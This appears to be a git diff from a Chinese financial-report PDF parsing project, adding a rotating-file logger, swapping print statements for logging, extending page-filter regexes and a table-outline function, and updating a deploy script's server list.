SELECT ori_measure_id,ori_measure_name FROM {table_name}
|
||||
'''
|
||||
cursor.execute(select_query)
|
||||
records = cursor.fetchall()
|
||||
print(f"总计{len(records)}条数据")
|
||||
for record in records:
|
||||
if redis_client.hexists('measure_config', record[0]):
|
||||
measure_vector = redis_client.hget('measure_config', record[0])
|
||||
else:
|
||||
print('新增指标',record[1])
|
||||
vector_obj = utils.embed_with_str(record[1])
|
||||
measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])
|
||||
|
||||
redis_client.hset('measure_config', record[0], measure_vector)
|
||||
redis_client.close()
|
||||
conn.close()
|
||||
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
|
||||
if __name__ == "__main__":
|
||||
#需要先清空本地数据库的 measure_create_config 和 measure_create_period 表
|
||||
|
||||
# process_excel_and_db(
|
||||
# 'F:\\11_pdf\\ttt_1.xlsx',#ttt文件
|
||||
# 'F:\\11_pdf\\period_1.xlsx',#period文件
|
||||
# 'F:\\11_pdf\\out_2022_new_year.txt'#输出文件
|
||||
# )
|
||||
from config import MYSQL_HOST_APP, MYSQL_USER_APP, MYSQL_PASSWORD_APP, MYSQL_DB_APP
|
||||
conn = mysql.connector.connect(
|
||||
host=MYSQL_HOST_APP,
|
||||
user=MYSQL_USER_APP,
|
||||
password=MYSQL_PASSWORD_APP,
|
||||
database=MYSQL_DB_APP
|
||||
)
|
||||
cursor = conn.cursor()
|
||||
#file_path = r'F:\\11_pdf\\out_2022_new_year.txt'
|
||||
|
||||
|
||||
|
||||
# 更新第一季度的measure_vector
|
||||
table_name = 'measure_config'
|
||||
# 写入mysql
|
||||
# measure_config_to_db(conn, cursor, table_name)
|
||||
create_new_config(conn, cursor, table_name,'2023','2024')
|
||||
# 插入redies
|
||||
insert_measure_vector(conn,cursor,table_name)
|
||||
|
||||
|
|
@ -0,0 +1,51 @@
|
|||
import logging
|
||||
import os
|
||||
from logging.handlers import RotatingFileHandler
|
||||
|
||||
def setup_logging():
|
||||
# 创建logs目录(如果不存在)
|
||||
log_dir = 'logs'
|
||||
if not os.path.exists(log_dir):
|
||||
os.makedirs(log_dir)
|
||||
|
||||
# 配置根日志记录器
|
||||
root_logger = logging.getLogger()
|
||||
|
||||
# 如果已经有handlers,先移除它们以防重复
|
||||
if root_logger.handlers:
|
||||
for handler in root_logger.handlers[:]:
|
||||
root_logger.removeHandler(handler)
|
||||
|
||||
root_logger.setLevel(logging.INFO)
|
||||
|
||||
# 创建格式化器
|
||||
formatter = logging.Formatter(
|
||||
'%(asctime)s - %(name)s - %(levelname)s - %(message)s'
|
||||
)
|
||||
|
||||
# 创建文件处理器
|
||||
file_handler = RotatingFileHandler(
|
||||
os.path.join(log_dir, 'app.log'),
|
||||
maxBytes=10*1024*1024, # 10MB
|
||||
backupCount=5
|
||||
)
|
||||
file_handler.setLevel(logging.INFO)
|
||||
file_handler.setFormatter(formatter)
|
||||
|
||||
# 创建控制台处理器
|
||||
console_handler = logging.StreamHandler()
|
||||
console_handler.setLevel(logging.INFO)
|
||||
console_handler.setFormatter(formatter)
|
||||
|
||||
# 添加处理器到根日志记录器
|
||||
root_logger.addHandler(file_handler)
|
||||
root_logger.addHandler(console_handler)
|
||||
|
||||
# 设置propagate=False以防止日志消息向上传播
|
||||
for logger_name in logging.root.manager.loggerDict:
|
||||
logger = logging.getLogger(logger_name)
|
||||
logger.propagate = False
|
||||
|
||||
return root_logger
|
||||
|
||||
logger = setup_logging()
|
|
@ -22,8 +22,7 @@ from multiprocessing import Process
|
|||
from config import REDIS_HOST,REDIS_PORT,REDIS_PASSWORD
|
||||
import redis
|
||||
from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection,MilvusClient
|
||||
|
||||
|
||||
from log_config import logger
|
||||
|
||||
'''
|
||||
已知发现问题:
|
||||
|
@ -40,7 +39,7 @@ from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Colle
|
|||
|
||||
|
||||
STR_PATTERN = '营业收入|净利润|变动比例|损益|现金流量净额|现金净流量|现金流|每股收益|总资产|资产总额|收益率|货币资金|应收账款|存货|固定资产|在建工程|商誉|短期借款|应付账款|合同负债|长期借款|营业成本|销售费用|管理费用|财务费用|研发费用|研发投入|计入当期损益的政府补助'
|
||||
PATTERN = '品牌类型|分门店|销售渠道|行业名称|产品名称|地区名称|子公司名称|业绩快报|调整情况说明|调整年初资产负债表|主要子公司|分部|母公司资产负债表|显示服务|渠道|商品类型|合同分类|会计政策变更|地区分类|研发项目|分类产品|表头不合规的表格|内部控制评价|关联方|国内地区|国外地区|销售区域|存货库龄|外币|逾期60天以上|欧元|英镑|美元|日元'
|
||||
PATTERN = '品牌类型|分门店|销售渠道|行业名称|产品名称|地区名称|子公司名称|业绩快报|调整情况说明|调整年初资产负债表|主要子公司|分部|母公司资产负债表|显示服务|渠道|商品类型|合同分类|会计政策变更|地区分类|研发项目名称|分类产品|表头不合规的表格|内部控制评价|关联方|国内地区|国外地区|销售区域|存货库龄|外币|逾期60天以上|欧元|英镑|(?<=\d)美元|\美元(?=\d)|日元'
|
||||
MUILT_PATTERN = '调整前'
|
||||
#unit_pattern = re.compile(r'单位[:|:]?(百万元|千万元|亿元|万元|千元|元)')
|
||||
unit_pattern = re.compile(r'(单位|单元|人民币).{0,6}?(百万元|千万元|亿元|万元|千元|元).{0,3}?')#修改单位匹配规则,不限制冒号,只限制距离
|
||||
|
@ -81,7 +80,7 @@ def safe_process_array(func, arr):
|
|||
try:
|
||||
return func(arr)
|
||||
except Exception as e:
|
||||
print(f"这个函数出现了报错{func.__name__}: {e}")
|
||||
logger.info(f"这个函数出现了报错{func.__name__}: {e}")
|
||||
return arr # 返回原数组以便继续后续处理
|
||||
|
||||
#单独针对三季报的资产负债表识别合并问题
|
||||
|
@ -199,7 +198,7 @@ def process_array_with_grants(arr, keywords=['本报告期', '年初至报告期
|
|||
|
||||
def get_table_range(file_path, file_id, pages, tables_range):
|
||||
|
||||
print('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
|
||||
logger.info(f'Run task 解析表格--{pages} {os.getpid()}')
|
||||
start = time.time()
|
||||
|
||||
conn = mysql.connector.connect(
|
||||
|
@ -223,12 +222,26 @@ def get_table_range(file_path, file_id, pages, tables_range):
|
|||
try:
|
||||
tables = camelot.read_pdf(file_path, pages=pages, strip_text=',\n', copy_text=['v','h'],shift_text = ['l'])
|
||||
for t in tables:
|
||||
|
||||
top = t._bbox[3]
|
||||
buttom = t._bbox[1]
|
||||
page_num = int(t.page)
|
||||
table_index = int(t.order)
|
||||
arr = np.array(t.data)
|
||||
|
||||
if page_num != 0:
|
||||
# 表格数据写入
|
||||
line_texts = []
|
||||
for lines in t.data:
|
||||
lines = list(set(lines))
|
||||
for line in lines:
|
||||
line_texts.append(line)
|
||||
|
||||
db_service.batch_insert_page_text_nocheck({
|
||||
'file_id': file_id,
|
||||
'page_num' : page_num,
|
||||
'text' : line_texts
|
||||
},conn,cursor)
|
||||
|
||||
arr = safe_process_array(process_array, arr) #部分资产负债表合并问题
|
||||
arr = safe_process_array(process_array_with_annual_comparison, arr) #复杂表格的优化"多个上年同期时处理"
|
||||
arr = safe_process_array(process_array_with_grants, arr) #三季报的非经常损益
|
||||
|
@ -421,8 +434,14 @@ def get_table_range(file_path, file_id, pages, tables_range):
|
|||
"data" : new_data,
|
||||
'sort_num' : page_num*1000 - top
|
||||
}},conn_app,cursor_app)
|
||||
|
||||
|
||||
|
||||
except Exception as e:
|
||||
print(f'camelot解析表格时出现了{e}')
|
||||
logger.info(f'camelot解析表格时出现了{e}')
|
||||
|
||||
|
||||
|
||||
get_text_content(file_path, file_id, tables_range, pages, conn, cursor, redis_client, conn_app, cursor_app)
|
||||
|
||||
cursor.close()
|
||||
|
@ -432,7 +451,7 @@ def get_table_range(file_path, file_id, pages, tables_range):
|
|||
redis_client.close()
|
||||
|
||||
end = time.time()
|
||||
print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
|
||||
logger.info('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
|
||||
|
||||
def text_in_table(top, tables_range, page_num):
|
||||
if tables_range.get(page_num):
|
||||
|
@ -468,7 +487,7 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
|
|||
|
||||
page_start = pages.split('-')[0]
|
||||
page_end = pages.split('-')[1]
|
||||
print(f'pages的值为{pages}')
|
||||
logger.info(f'pages的值为{pages}')
|
||||
select_year_select = f"""select report_type,year from report_check where id = {file_id}"""
|
||||
cursor.execute(select_year_select)
|
||||
record_select = cursor.fetchall()
|
||||
|
@ -513,8 +532,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
|
|||
line_text = re.sub(r"\s", "", line_text)
|
||||
|
||||
#提取符合要求的文本写入pdf_text_info,用于文本书写错误识别
|
||||
if not utils.pdf_text_flag(line_text):
|
||||
line_texts.append(line_text)
|
||||
# if not utils.pdf_text_flag(line_text):
|
||||
line_texts.append(line_text)
|
||||
#db_service.insert_pdf_text_info({
|
||||
# 'file_id': file_id,
|
||||
# 'page_num' : pagenum+1,
|
||||
|
@ -536,7 +555,7 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
|
|||
if text_type in ('page_header','page_footer'):
|
||||
break
|
||||
if pagenum ==44:
|
||||
print(f'line_text在第44页的值有{line_text}')
|
||||
logger.info(f'line_text在第44页的值有{line_text}')
|
||||
#这个对一整页都有用,会去掉很多正确的表
|
||||
# 记录需要过滤掉的页码
|
||||
if len(re.findall('母公司|现金流量表补充', line_text)) > 0 :
|
||||
|
@ -546,10 +565,11 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
|
|||
'type': 'parent_com',
|
||||
},conn_app,cursor_app)
|
||||
|
||||
|
||||
# 保存每个表格上方小范围区域的文字,这部分内容包含了表格的标题和指标单位
|
||||
table_info = {}
|
||||
|
||||
if utils.check_table_title_black_list(line_text,title_list):
|
||||
|
||||
db_service.insert_measure_parser_info({
|
||||
'file_id': file_id,
|
||||
'content': f"{range['page_num']}_{range['table_index']}",
|
||||
|
@ -613,6 +633,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
|
|||
table_info = {}
|
||||
# 记录需要过滤掉的页码
|
||||
if len(re.findall('母公司|现金流量表补充', line_text)) > 0:
|
||||
logger.info(f'line_text{line_text}')
|
||||
logger.info(f'pagenum{pagenum}')
|
||||
db_service.insert_measure_parser_info({
|
||||
'file_id': file_id,
|
||||
'content': pagenum+2,
|
||||
|
@ -665,8 +687,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
|
|||
'text' : line_texts
|
||||
},conn,cursor)
|
||||
except Exception as e:
|
||||
print(f'{pagenum}页处理异常')
|
||||
print(e)
|
||||
logger.info(f'{pagenum}页处理异常')
|
||||
logger.info(e)
|
||||
|
||||
|
||||
def get_table_unit_info(file_id,line_text,page_num,table_index):
|
||||
|
@ -725,7 +747,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
|
|||
uri=MILVUS_CLIENT,
|
||||
)
|
||||
|
||||
print('提取指标任务 %s (%s)...' % (record_range, os.getpid()))
|
||||
logger.info('提取指标任务 %s (%s)...' % (record_range, os.getpid()))
|
||||
start = time.time()
|
||||
record_start = record_range.split('-')[0]
|
||||
record_end = record_range.split('-')[1]
|
||||
|
@ -738,10 +760,8 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
|
|||
arr = np.array(t['data'])
|
||||
rows, cols = arr.shape
|
||||
if rows == 1 and cols == 1:
|
||||
continue
|
||||
|
||||
continue
|
||||
row_num , col_num = -1 , -1
|
||||
|
||||
# 使用嵌套循环遍历数组,获取第一个数值位置
|
||||
for i in range(rows):
|
||||
for j in range(cols):
|
||||
|
@ -834,6 +854,8 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
|
|||
|
||||
redis_client.incr(f'parsed_measure_count_{file_id}')
|
||||
|
||||
|
||||
|
||||
if len(measure_list) > 0:
|
||||
data_dict["measure_list"] = measure_list
|
||||
data_dict["page_num"] = f"{str(t['page_num'])}_{str(t['table_index'])}"
|
||||
|
@ -841,12 +863,12 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
|
|||
measure_obj.append(data_dict)
|
||||
db_service.insert_measure_data_to_milvus(client,partition_name,measure_obj,cursor_app,conn_app)
|
||||
except Exception as e:
|
||||
print(f"循环获取表格数据这里报错了,数据是{t['data']},位置在{index}")
|
||||
print(f"错误是:{e}")
|
||||
logger.info(f"循环获取表格数据这里报错了,数据是{t['data']},位置在{index}")
|
||||
logger.info(f"错误是:{e}")
|
||||
end = time.time()
|
||||
print('提取指标 %s runs %0.2f seconds.' % (record_range, (end - start)))
|
||||
logger.info('提取指标 %s runs %0.2f seconds.' % (record_range, (end - start)))
|
||||
except Exception as e:
|
||||
print(f'这个错误是{e},所在的位置是{record_start}-{record_end}')
|
||||
logger.info(f'这个错误是{e},所在的位置是{record_start}-{record_end}')
|
||||
record_start = record_range.split('-')[0]
|
||||
record_end = record_range.split('-')[1]
|
||||
for index in range(int(record_start),int(record_end)):
|
||||
|
@ -857,7 +879,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
|
|||
try:
|
||||
arr = np.array(t['data'])
|
||||
except Exception as e:
|
||||
print(f'这个错误是{e}的arr的值是{arr}')
|
||||
logger.info(f'这个错误是{e}的arr的值是{arr}')
|
||||
finally:
|
||||
redis_client.close()
|
||||
cursor.close()
|
||||
|
@ -877,7 +899,7 @@ def dispatch_job(job_info):
|
|||
get_table_range(path, file_id, page_num, tables_range)
|
||||
|
||||
except Exception as e:
|
||||
print(e)
|
||||
logger.info(e)
|
||||
|
||||
#指标归一化处理
|
||||
|
||||
|
@ -901,7 +923,7 @@ def update_measure_data(file_id,file_path,parent_table_pages,partition_name):
|
|||
|
||||
# 创建一个cursor对象来执行SQL语句
|
||||
cursor_app = conn_app.cursor(buffered=True)
|
||||
print(f'目录黑名单为:{parent_table_pages}')
|
||||
logger.info(f'目录黑名单为:{parent_table_pages}')
|
||||
db_service.delete_to_run(conn,cursor,file_id)
|
||||
db_service.insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_path, partition_name)
|
||||
|
||||
|
@ -913,6 +935,44 @@ def update_measure_data(file_id,file_path,parent_table_pages,partition_name):
|
|||
cursor_app.close()
|
||||
conn_app.close()
|
||||
|
||||
|
||||
# def merge_consecutive_arrays(word_info):
|
||||
# merged_objects = []
|
||||
# temp_list = []
|
||||
|
||||
# for info_obj in word_info:
|
||||
# try:
|
||||
# if info_obj['type'] == 'table':
|
||||
# # 如果对象是表格,将其元素添加到临时列表中
|
||||
# data = info_obj['data']
|
||||
# if not data:
|
||||
# continue
|
||||
# first_row = data[0]
|
||||
# if all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) == 0:
|
||||
# temp_list.append(info_obj)
|
||||
# elif all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
|
||||
# merged_objects.append(temp_list)
|
||||
# temp_list = []
|
||||
# temp_list.append(info_obj)
|
||||
# elif not all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
|
||||
# temp_data = temp_list[-1]['data']
|
||||
# temp_data = list(temp_data)
|
||||
# for row in list(info_obj['data']):
|
||||
# temp_data.append(row)
|
||||
# info_obj['data'] = temp_data
|
||||
# temp_list.clear()
|
||||
# temp_list.append(info_obj)
|
||||
|
||||
|
||||
# except Exception as e:
|
||||
|
||||
# applog.error(f"解析数据错误: {e}")
|
||||
|
||||
# if temp_list:
|
||||
# merged_objects.append(temp_list)
|
||||
|
||||
# return merged_objects
|
||||
|
||||
def merge_consecutive_arrays(pdf_info):
|
||||
merged_objects = []
|
||||
temp_array = {}
|
||||
|
@ -941,7 +1001,7 @@ def merge_consecutive_arrays(pdf_info):
|
|||
temp_array = {} # 重置临时列表
|
||||
except Exception as e:
|
||||
#print(info_obj)
|
||||
print(f"解析数据错误: {e}")
|
||||
logger.info(f"解析数据错误: {e}")
|
||||
|
||||
if temp_array:
|
||||
merged_objects.append(temp_array)
|
||||
|
@ -980,7 +1040,7 @@ def merge_consecutive_arrays_v1(pdf_info):
|
|||
merged_objects.append(temp_array)
|
||||
temp_array = {} # 重置临时列表
|
||||
except Exception as e:
|
||||
print(f"解析数据错误: {e}")
|
||||
logger.info(f"解析数据错误: {e}")
|
||||
|
||||
# 循环结束后,检查临时列表是否非空,如果非空,则添加到结果中
|
||||
if temp_array:
|
||||
|
@ -1017,7 +1077,7 @@ def start_table_measure_job(file_id,partition_name):
|
|||
redis_client.close()
|
||||
|
||||
records_range_parts = utils.get_range(len(pdf_tables),MEASURE_COUNT)
|
||||
print(f'records_range_part识别页码的值为{records_range_parts}')
|
||||
logger.info(f'records_range_part识别页码的值为{records_range_parts}')
|
||||
processes = []
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -157,7 +157,7 @@ def create_text_outline(pdf_path, file_id):
|
|||
if len(re.findall('财务报表主要项目注释', title)) == 0:
|
||||
page_end = page_end - 1
|
||||
# print(title,page_start,page_end)
|
||||
for i in range(page_start, page_end + 1):
|
||||
for i in range(page_start, page_end):
|
||||
# 将每个数字添加到列表中
|
||||
parent_table_pages_local[file_id].append(i)
|
||||
file_info['page_count'] = page_count
|
||||
|
@ -168,6 +168,68 @@ def create_text_outline(pdf_path, file_id):
|
|||
|
||||
return file_info
|
||||
|
||||
|
||||
def create_text_outline_disclosure(pdf_path, file_id):
|
||||
# print('Running the script for [%s] with padding [%d]' % (pdf_path, page_number_padding))
|
||||
# creating an object
|
||||
with open(pdf_path, 'rb') as file:
|
||||
file_info = {}
|
||||
fileReader = PyPDF2.PdfReader(file)
|
||||
page_count = len(fileReader.pages)
|
||||
|
||||
redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)
|
||||
redis_client.set(f'page_count_{file_id}', page_count)
|
||||
|
||||
info = {
|
||||
'page_count': page_count,
|
||||
'all_pages': {},
|
||||
'current_page_id': 1,
|
||||
'padding': 0
|
||||
}
|
||||
|
||||
print('Number of pages: %d' % info['page_count'])
|
||||
|
||||
pages = fileReader.trailer['/Root']['/Pages'].get_object()
|
||||
recursive_numbering(pages, info)
|
||||
#for page_num, page in enumerate(pages['/Kids']):
|
||||
# page_obj = page.getObject()
|
||||
# all_pages[id(page_obj)] = page_num + 1 # who starts counting from 0 anyways?
|
||||
title_array = get_tree_pages(fileReader.outline, info, 0, [])
|
||||
#db_service.pdf_title_insert_mysql(file_id,title_array)
|
||||
#title_array = db_service.get_file_info_from_mysql(file_id)
|
||||
|
||||
parent_table_pages_local = {}
|
||||
parent_table_pages_local[file_id] = []
|
||||
print(f'{file_id}:{len(title_array)}')
|
||||
for i in range(len(title_array)):
|
||||
title_obj = title_array[i]
|
||||
title = title_obj['title']
|
||||
#print(f'标题分别是{title}')
|
||||
if len(re.findall('母公司|现金流量表补充|重要会计政策|会计估计变更|公允价值的披露|合营安排或联营企业中的权益|与金融工具相关的风险|税项|主要控股参股公司|结构化主体情况|公司股份总数及股东结构变动及公司资产和负债结构的变动情况|所有权或使用权受到限制的资产|在建工程|固定资产|其他主体中的权益|分部信息|与金融工具相关的风险|其他关联交易|公司子公司重大事项', title)) >0 :
|
||||
page_start = title_obj['page_num']
|
||||
depth = title_obj['depth']
|
||||
if i < len(title_array) - 1:
|
||||
page_end = title_array[i+1]['page_num']
|
||||
if title_array[i]['depth'] in [1,2]:
|
||||
page_end = get_page_end(i+1, depth, title_array)
|
||||
else:
|
||||
page_end = page_count
|
||||
print(f'目录识别时被丢弃的页码:{page_start}-{page_end}')
|
||||
|
||||
#当标题为母公司财务报表主要项目注释时,最后一页不过滤,避免核心roe指标无法召回
|
||||
if len(re.findall('财务报表主要项目注释', title)) == 0:
|
||||
page_end = page_end - 1
|
||||
# print(title,page_start,page_end)
|
||||
for i in range(page_start, page_end + 1):
|
||||
# 将每个数字添加到列表中
|
||||
parent_table_pages_local[file_id].append(i)
|
||||
file_info['page_count'] = page_count
|
||||
file_info['parent_table_pages'] = parent_table_pages_local[file_id]
|
||||
file_info['split_parts'] = get_file_split(page_count)
|
||||
|
||||
redis_client.close()
|
||||
|
||||
return file_info
|
||||
if __name__ == '__main__':
|
||||
import time
|
||||
path = "/Users/zhengfei/Desktop/cb/2023年报检测/安妮股份.pdf"
|
||||
|
|
|
@ -2,18 +2,18 @@
|
|||
|
||||
# 设置文件路径和目标目录# 请注意这列的config文件是不可以进行传输的 /root/pdf_parser/zzb_data_prod/utils.py /root/pdf_parser/zzb_data_prod/db_service.py
|
||||
#FILES="/root/pdf_parser/zzb_data_prod/utils.py /root/pdf_parser/zzb_data_prod/db_service.py /root/pdf_parser/zzb_data_prod/app.py /root/pdf_parser/zzb_data_prod/main.py /root/pdf_parser/zzb_data_prod/pdf_title.py"
|
||||
FILES="/root/pdf_parser/zzb_data_prod/main.py"
|
||||
FILES="/root/pdf_parser/zzb_data_prod/put_code.sh"
|
||||
DEST_PATH="/root/pdf_parser/zzb_data_prod"
|
||||
|
||||
# 设置服务器列表 主服务器 "1.94.143.23" "113.44.72.157" "1.94.101.237" "123.60.16.225" "124.71.157.162" "1.94.60.103" "1.94.143.23" "124.71.149.225" "113.44.52.221" "121.37.137.13"
|
||||
#SERVERS=("113.44.72.157" "1.94.101.237" "123.60.16.225" "124.71.157.162" "1.94.60.103" "124.71.149.225" "113.44.52.221" "121.37.137.13" "123.60.28.83" "192.168.0.19" "192.168.0.53" "192.168.0.150" "192.168.0.210" "192.168.0.129" "192.168.0.24" "192.168.0.250" "192.168.0.162" "192.168.0.86" "192.168.0.88" "192.168.0.93" "192.168.0.228" "192.168.0.155" "192.168.0.186" "192.168.0.56" "192.168.0.185" "192.168.0.72" "192.168.0.35" "192.168.0.230" "192.168.0.125" "192.168.0.46" "192.168.0.131")
|
||||
#SERVERS=("192.168.0.228" "192.168.0.155" "192.168.0.186" "192.168.0.56" "192.168.0.185")
|
||||
#监管服务器
|
||||
SERVERS=("192.168.0.108" "192.168.0.131")
|
||||
#SERVERS=("192.168.0.108" "192.168.0.131")
|
||||
#企业服务器
|
||||
#SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239")
|
||||
#两者一起
|
||||
#SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239" "192.168.0.108" "192.168.0.131")
|
||||
SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239" "192.168.0.108" "192.168.0.131")
|
||||
# 遍历每个服务器并上传文件
|
||||
for SERVER in "${SERVERS[@]}"; do
|
||||
echo "Uploading files to $SERVER"
|
||||
|
|
|
@ -10,4 +10,6 @@ pydantic
|
|||
uvicorn
|
||||
redis
|
||||
ghostscript
|
||||
opencv-python-headless
|
||||
opencv-python-headless
|
||||
python-docx
|
||||
docx2pdf
|
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
|
@ -1,175 +1,175 @@
|
|||
import PyPDF2
|
||||
import re
|
||||
import os,threading
|
||||
from config import REDIS_HOST,REDIS_PORT,REDIS_PASSWORD
|
||||
import redis
|
||||
|
||||
def get_tree_pages(root, info, depth=0,title_array=[]):
|
||||
"""
|
||||
Recursively iterate the outline tree
|
||||
Find the pages pointed by the outline item
|
||||
and get the assigned physical order id
|
||||
|
||||
Decrement with padding if necessary
|
||||
"""
|
||||
|
||||
if isinstance(root, dict):
|
||||
# print(root)
|
||||
page = root['/Page'].get_object()
|
||||
# print(id(page))
|
||||
t = root['/Title']
|
||||
title = t
|
||||
if isinstance(t, PyPDF2.generic.ByteStringObject):
|
||||
title = t.original_bytes.decode('utf8')
|
||||
title = title.strip()
|
||||
title = title.replace('\n', '')
|
||||
title = title.replace('\r', '')
|
||||
|
||||
page_num = info['all_pages'].get(id(page), 0)
|
||||
if page_num == 0:
|
||||
print('Not found page number for /Page!', page)
|
||||
elif page_num < info['padding']:
|
||||
page_num = 0
|
||||
else:
|
||||
page_num -= info['padding']
|
||||
|
||||
|
||||
# str_val = '%-5d' % page_num
|
||||
# str_val += '\t' * depth
|
||||
# str_val += title + '\t' + '%3d' % page_num
|
||||
# print(str_val)
|
||||
title_array.append({
|
||||
'title': title,
|
||||
'page_num': page_num,
|
||||
'depth': depth
|
||||
})
|
||||
for elem in root:
|
||||
get_tree_pages(elem, info, depth+1,title_array)
|
||||
return title_array
|
||||
|
||||
|
||||
def recursive_numbering(obj, info):
|
||||
"""
|
||||
Recursively iterate through all the pages in order and assign them a physical
|
||||
order number
|
||||
"""
|
||||
# print(id(obj), obj)
|
||||
if obj['/Type'] == '/Page':
|
||||
obj_id = id(obj)
|
||||
if obj_id not in info['all_pages']:
|
||||
info['all_pages'][obj_id] = info['current_page_id']
|
||||
info['current_page_id'] += 1
|
||||
return
|
||||
elif obj['/Type'] == '/Pages':
|
||||
for page in obj['/Kids']:
|
||||
recursive_numbering(page.get_object(), info)
|
||||
|
||||
def get_numbers_between(numbers_between,start, end):
|
||||
# 初始化一个空列表来存储两个数字之间的所有数字
|
||||
|
||||
# 遍历从开始数字到结束数字之间的每个数字
|
||||
for i in range(start, end + 1):
|
||||
# 将每个数字添加到列表中
|
||||
numbers_between.append(i)
|
||||
return numbers_between
|
||||
|
||||
def get_page_end(start, depth, title_array):
|
||||
page_end = -1
|
||||
for i in range(start, len(title_array)):
|
||||
if title_array[i]['depth'] == depth:
|
||||
page_end = title_array[i]['page_num']
|
||||
break
|
||||
return page_end
|
||||
|
||||
def get_file_split(page_count):
|
||||
# 获取 CPU 核数
|
||||
cpu_count = os.cpu_count()
|
||||
if page_count < cpu_count:
|
||||
cpu_count = page_count
|
||||
# 使用 divmod() 函数计算除法结果和余数
|
||||
quotient, remainder = divmod(page_count, cpu_count)
|
||||
table_split_parts = []
|
||||
text_split_parts = []
|
||||
for i in range(cpu_count):
|
||||
start_num = i * quotient
|
||||
if i < cpu_count-1:
|
||||
start_num = i * quotient
|
||||
end_num = start_num+quotient
|
||||
else:
|
||||
end_num = page_count
|
||||
table_split_parts.append(f'{start_num}-{end_num}')
|
||||
text_split_parts.append(get_numbers_between([],start_num, end_num))
|
||||
|
||||
# 返回除法结果和余数
|
||||
return {
|
||||
'table_split_parts': table_split_parts,
|
||||
'text_split_parts': text_split_parts
|
||||
}
|
||||
|
||||
def create_text_outline(pdf_path, file_id):
|
||||
# print('Running the script for [%s] with padding [%d]' % (pdf_path, page_number_padding))
|
||||
# creating an object
|
||||
with open(pdf_path, 'rb') as file:
|
||||
file_info = {}
|
||||
fileReader = PyPDF2.PdfReader(file)
|
||||
page_count = len(fileReader.pages)
|
||||
|
||||
redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)
|
||||
redis_client.set(f'page_count_{file_id}', page_count)
|
||||
|
||||
info = {
|
||||
'page_count': page_count,
|
||||
'all_pages': {},
|
||||
'current_page_id': 1,
|
||||
'padding': 0
|
||||
}
|
||||
|
||||
print('Number of pages: %d' % info['page_count'])
|
||||
|
||||
pages = fileReader.trailer['/Root']['/Pages'].get_object()
|
||||
recursive_numbering(pages, info)
|
||||
#for page_num, page in enumerate(pages['/Kids']):
|
||||
# page_obj = page.getObject()
|
||||
# all_pages[id(page_obj)] = page_num + 1 # who starts counting from 0 anyways?
|
||||
title_array = get_tree_pages(fileReader.outline, info, 0, [])
|
||||
|
||||
parent_table_pages_local = {}
|
||||
parent_table_pages_local[file_id] = []
|
||||
print(f'{file_id}:{len(title_array)}')
|
||||
for i in range(len(title_array)):
|
||||
title_obj = title_array[i]
|
||||
title = title_obj['title']
|
||||
#print(f'标题分别是{title}')
|
||||
if len(re.findall('母公司|现金流量表补充|重要会计政策|会计估计变更|公允价值的披露|合营安排或联营企业中的权益|与金融工具相关的风险|税项', title)) >0 :
|
||||
page_start = title_obj['page_num']
|
||||
depth = title_obj['depth']
|
||||
if i < len(title_array) - 1:
|
||||
page_end = title_array[i+1]['page_num']
|
||||
if title_array[i]['depth'] in [1,2]:
|
||||
page_end = get_page_end(i+1, depth, title_array)
|
||||
else:
|
||||
page_end = page_count
|
||||
print(f'目录识别时被丢弃的页码:{page_start}-{page_end}')
|
||||
|
||||
#当标题为母公司财务报表主要项目注释时,最后一页不过滤,避免核心roe指标无法召回
|
||||
if len(re.findall('财务报表主要项目注释', title)) == 0:
|
||||
page_end = page_end - 1
|
||||
# print(title,page_start,page_end)
|
||||
for i in range(page_start, page_end + 1):
|
||||
# 将每个数字添加到列表中
|
||||
parent_table_pages_local[file_id].append(i)
|
||||
file_info['page_count'] = page_count
|
||||
file_info['parent_table_pages'] = parent_table_pages_local[file_id]
|
||||
file_info['split_parts'] = get_file_split(page_count)
|
||||
|
||||
redis_client.close()
|
||||
|
||||
return file_info
|
||||
|
||||
if __name__ == '__main__':
|
||||
import time
|
||||
path = "/Users/zhengfei/Desktop/cb/2023年报检测/安妮股份.pdf"
|
||||
|
||||
threading.Thread(target=create_text_outline, args=(path,'111')).start()
|
||||
time.sleep(5)
|
||||
threading.Thread(target=create_text_outline, args=(path,'222')).start()
|
||||
import PyPDF2
|
||||
import re
|
||||
import os,threading
|
||||
from config import REDIS_HOST,REDIS_PORT,REDIS_PASSWORD
|
||||
import redis
|
||||
|
||||
def get_tree_pages(root, info, depth=0,title_array=[]):
|
||||
"""
